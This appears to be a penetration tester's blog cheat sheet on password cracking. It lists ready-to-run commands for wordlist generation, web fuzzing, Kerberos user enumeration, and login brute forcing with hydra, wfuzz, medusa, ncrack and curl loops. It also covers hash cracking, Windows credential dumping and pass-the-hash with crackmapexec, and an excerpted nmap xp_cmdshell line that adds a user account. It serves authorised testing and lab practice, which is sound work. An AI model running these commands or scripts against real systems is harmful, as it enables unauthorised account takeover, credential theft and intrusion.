Skip to main content

Password Cracking



Good Post: Bruteforcing using Custom Scripts
Crunch:
crunch 8 8 -t Any_Characers -o list.txt

if you want to create something like Bha!!123

crunch 8 8 -t ,@@^^%%%

, = Upper case letter
@=lower case letters
^ = special characters
%= numbers
Generating Wordlist using kwprocessor

this is used for generating random passwords that users might use as a streak on the keyboard
example: qwertyuiop[]\

git clone https://github.com/hashcat/kwprocessor.git

#Create a keyword based on routes users use to create passwords
./kwp basechars/full.base keymaps/en-gb.keymap routes/2-to-16-max-3-direction-changes.route > kwp.txt

Fuzzing for Webpages
wfuzz -c -w Rockyou.txt -z list,txt-php-html -u http://10.10.10.10/admin/FUZZ.FUZ2Z --hc 404,403 -t 100 

#show all responses except 404; -s --> negative responses
gobuster dir --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s 404

#Fuzzing Webpages ; -b negative responses; -k --> ignore certificate errors
gobuster fuzz -k --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -b 404

#Fuzzing using dirsearch 
dirsearch -u http://10.10.10.10 -e html,php,txt,asp,aspx -x 404

Fuzzing Webpages using bash

for id in $(seq 1 10000); do echo "http://www.xyz.com/index.php?id=$id" done
Bruteforcing kerberos 

Github Usernames  Github Kerbrute

./kerbrute userenum --dc 10.10.10.10 -d domain.local /usr/share/wordlists/kerberos_enum_userlists/Top_50_Female_Firstnames.Surname.txt
Fuzzing Hosts
wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.10/ --hc 400 --hh 8193 
Subdomain Brute Force

wfuzz -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

*All Wordlists are from SecLists


Check for Non Existing responses, example 28 Words, so Lets grep out resposes which  gives out 28 Words as output

wfuzz -hw 28 -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

add the found url's to /etc/hosts
SubDomain Bruteforce using wfuzz

wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt –H "HOST:FUZZ.bhanu.notes" –u http://10.10.10.10/ --hc 400,301 -t 50 -c
Fuzzing using Wget 

#do not crawl the pages ending with the extensions, -R
wget -nd -r -R html,asp,php,aspx -P wordlist.txt hackingdream.net

# crawl the pages ending with the extensions, -A
wget -nd -r -A doc,pdf,docx,xls -P wordlist.txt hackingdream.net
Cewl for emails in the webpage

cewl -n -e http://10.10.10.10 > emails.txt
Bruteforcing Passwords - POST Using WFuzz

Intercept the admin login page request after entering Username and password & copy the FORM-LOGIN data

or

Firefox --> go to login page --> hit f12 --> network --> enter creds --> submit --> select POST request on network tab
--> headers tab --> click on "resend" and select "Edit and Resend" --> from there you can find the request body
use it for -d option
wfuzz -c --hh 11 -u "https://intra.redcross.htb/pages/actions.php" -X POST -d "user=FUZZ&pass=FUZZ&action=login" -w top-usernames-shortlist.txt Reference

Bruteforcing Passwords - POST Using WFuzz

wfuzz -X POST -u 'http://10.10.10.10/login.php' -d 'email=FUZZ&password=PASSWORD' -w emaillist --hc 200 -c

wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -X POST -d "user=admin&password=FUZZ&type=login" -w ~/Downloads/Tools/rockyou.txt

wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -d "user=admin&password=FUZZ" -z file,rockyou.txt

wfuzz -c -t 64 --basic access-admin:FUZZ -u http://10.10.10.10/api/system/version -w 100k-most-used-passwords-NCSC.txt --hc 401

Cheatsheet Cheatsheet-2 
Brute Forcing Passwords using Curl
for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -k https://10.10.10.10 -u root:"$pass" ;echo $pass & done -------------------------------------------------------
if [ $# -ne 1 ];then
echo "Usage: ./script <input-file>"
exit 1
fi

while read user pass; do
curl -iL --fail --data-urlencode user="$user" --data-urlencode password="$pass" http://foo.dev/login 1>/dev/null 2>&1
if [ $? -eq 0 ];then
echo "ok"
elif [ $? -ne 0 ]; then
echo "failed"
fi
done < $1 ----------------------------------------- url="http://foo.dev/login" for user in $(userlist_gen); do for pass in $(passlist_gen); do http_code=$(curl -L --data-urlencode user="$user" --data-urlencode password="$pass" "$url" -w '%{http_code}' -o /dev/null -s) if [[ $http_code -eq 302 ]]; then echo "Success: User: '$user' Pass: '$pass'" break 2 fi done done -------------------------------------------- WORKS GOOD ------------------------------------------ url="https://172.23.161.130/console" for pass in $(cat /usr/share/wordlists/rockyou.txt); do http_code=$(curl -k $url -u root:"$pass" -w '%{http_code}' -o /dev/null -s) if [[ $http_code -ne 401 ]]; then echo "Success: User: root, Pass: '$pass'" break 2 else echo "Wrong Password Root:$pass" fi done done
WPSCAN:

wpscan --url http://192.168.0.107 -P Wordlist.txt -U wordlist.txt -t 20

wpscan --url http://10.40.10.10/ -e ap,t,u 
Hydra:

hydra -l admin -P wordlist.txt -v VICTIM_IP ftp

hydra -l username -P password_file.txt -s port -f ip_address request_method /path
hydra -l admin -P 1000_common_passwords.txt -s 8080-f 10.10.10.10 http-get /index.html


For Wordpress:

hydra -L wordlist.txt -P wordlist.txt localhost -V 192.168.0.107 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^:invalid"

hydra -l username -P rockyou.txt url.com http-post-form "/portal/xlogin/:ed=^USER^&pw=^PASS^:S=302"
Cracking Web Page Passwords using patator

patator http_fuzz auth_type=basic url=http://FILE0 user_pass=FILE1:FILE2 0=hosts.txt 1=users.txt 2=pass.txt -x ignore:code=401

Cracking Putty Private Key.ppk

sudo apt install putty-tools

#Genrate id_rsa for ssg logi
n, if it asks for password - Password needs to be cracked
puttygen private.ppk -O private-openssh -o id_rsa

putty2john private.ppk > hash

john --format=PuTTY --fork=4 hash -w=wordlist.txt


#Enter the cracked password
puttygen private.ppk -O private-openssh -o id_rsa

Cracking mysql Hashes

mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;

#sample hash
$1$llol$srpNQb9srgHAqNAes0FGC1

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
Cracking bitlocker Recovery key using John


john --format=bitlocker-opencl -mask=?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d target_hashPWDUMP/fgdump: Used to Dump Windows Passwords,  Needs Admin Privileges to work.

you can also use bitcracker 

Cracking Recovery key with JTR


just run fgdump.exe in cmd and hashes get dumped onto a text file.
/etc/shadow Hashes 

if the hashes start with

$1$ - MD5
_  - BSDi Extended DES
$2$ or $2a$ - Blowfish
$5$ - SHA-256
$6$ - SHA-512
Windows Credential Editor(WCE): 

wce64.exe -w
Passing the Hash to login to windows:

pth-winexe

export SMBHASH=Copy_the_NTLM_Hash_FROM_fgdump

pthwinexe -U administrator% //Victim_IP cmd

Pass the Password

crackmapexec IP_Address -u username -d domain_name -p password

crackmapexec 10.10.10.10/24 -u bhanu -d steins -p Welcome@1


Pass the Hash
Bhanu:500:132kjb214vb2jh42v4l324v2432j4v:4332k4b32kj4b32jh4v3243::  #copy the last set of hash

crackmapexec 10.10.10.10/24 -u bhanu -d steins -H 4332k4b32kj4b32jh4v3243 --local 
Password Profiling: 

Creating Wordlists from a webpage or any source.

cewl www.website.com -m 6 -w /root/wordlist-cewl.txt
Password Mutation:

nano /etc/john/john.conf 
$[0-9]$[0-9]        /Adding a rule in John to add 2 numbers after each word

john --wordlist=wordlist-cewl.txt --rules --stdout > mutated_pass.txt
            /Apply these rules to existing passwords
Medusa:
medusa -h VICTIM_IP -u admin -P wordlist.txt -M http -m DIR:/admin -T 20
Ncrack:

ncrack -v -f --user administrator -P wordlist.txt rdp://VICTIM_IP,CL=1
        /Multiple Threads should not be used
LM and NTLM Hashes:
-------------------
NT based till 2003 stored 2 diff hashes -> Lan Manager and NTLan manager

LM Hashing:  weak, password longer than 7 chars are split into 2 strings
-----------
password is converted to uppercase before being hashed. each part is hashed seperately, 
no Salts --> prone to Rainbow tables attack

NTLM Hashing: Started from Windows Vista; SAM
--------------






Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in